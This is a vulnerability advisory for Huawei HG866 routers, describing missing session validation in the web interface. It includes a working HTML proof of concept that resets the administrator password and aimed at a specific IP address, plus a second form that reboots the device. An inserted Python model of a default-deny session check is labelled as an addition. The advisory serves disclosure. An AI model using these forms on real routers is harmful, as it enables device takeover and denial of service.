Huawei HG866 authentication bypass
Summary
The web management interface of Huawei HG866 routers has several pages that fail to validate the user's session. This allows an attacker to bypass authentication both locally and remotely.
Description
| Equipment ID: | EchoLife:HG866 |
| Hardware Version: | HG866GTA_VER.C, 01, 02 |
| Software Version: | V1R2C01SPC202, R3.2.4.92sbn - R3.4.2.257sbn, 3FE53864AOCB16 |
| Severity: | High |
| Impact: | Authentication Bypass |
| Attack vector: | Remote |
| Solution: | N/A |
| Reference: | N/A |
The Huawei HG866 router comes with a web management interface. Its ports are 4FE+2POTS+WIFI+2USB, and its optical interface is GPON, SC/APC.
The administrative web interface has pages that fail to validate the user's session, which allows the authentication to be bypassed both locally and remotely.
Due to the lack of session validation, it is possible to change the administrator's password by sending a POST request to the URL: /html/password.html.
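A single default-deny session check placed in front of every route prevents this class of bug, because no page can be left out of it. The model below is an added example, not Huawei's firmware code or the author's; the `sid` cookie, the session store, `/html/login.html` and the handler names are assumptions.

```python
import secrets

# Constructed model. The two page paths come from the advisory; the "sid"
# cookie, session store and handlers are assumptions for illustration.
PUBLIC_PAGES = {"/html/login.html"}  # hypothetical: only page served without a session
SESSIONS = {}                        # session token -> username


def login(user):
    """Issue an unguessable session token (credential check not shown)."""
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = user
    return token


def change_password(form, state):
    if not form.get("psw") or form.get("psw") != form.get("reenterpsw"):
        return 400, "passwords do not match"
    state["password_changes"] += 1
    return 200, "password changed"


def reboot(form, state):
    state["reboots"] += 1
    return 200, "rebooting"


ROUTES = {
    ("POST", "/html/password.html"): change_password,
    ("POST", "/html/admin_reboot.html"): reboot,
}


def dispatch(method, path, cookies, form, state, enforce_session=True):
    """Route one request. enforce_session=False models the behaviour the
    advisory describes: the handler runs without any session check."""
    # Default deny: the check runs before routing, so no page can be
    # exposed by leaving session validation out of its own handler.
    if enforce_session and path not in PUBLIC_PAGES:
        if SESSIONS.get(cookies.get("sid", "")) is None:
            return 401, "login required"
    handler = ROUTES.get((method, path))
    if handler is None:
        return 404, "not found"
    return handler(form, state)
```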
POC
<!-- Change root password to password -->
<form name="hg866bypass" action="http://187.162.144.50/html/password.html" method="post">
  <input name="psw" value="password">
  <input name="reenterpsw" value="password">
  <input type="submit" name="save" value="Apply" />
</form>

<!-- Reboot the device -->
<form name="hg866dos" action="http://192.168.100.251/html/admin_reboot.html" method="post">
  <input type="submit" name="save" id="save" value="Reboot" />
</form>
Pedro Joaquín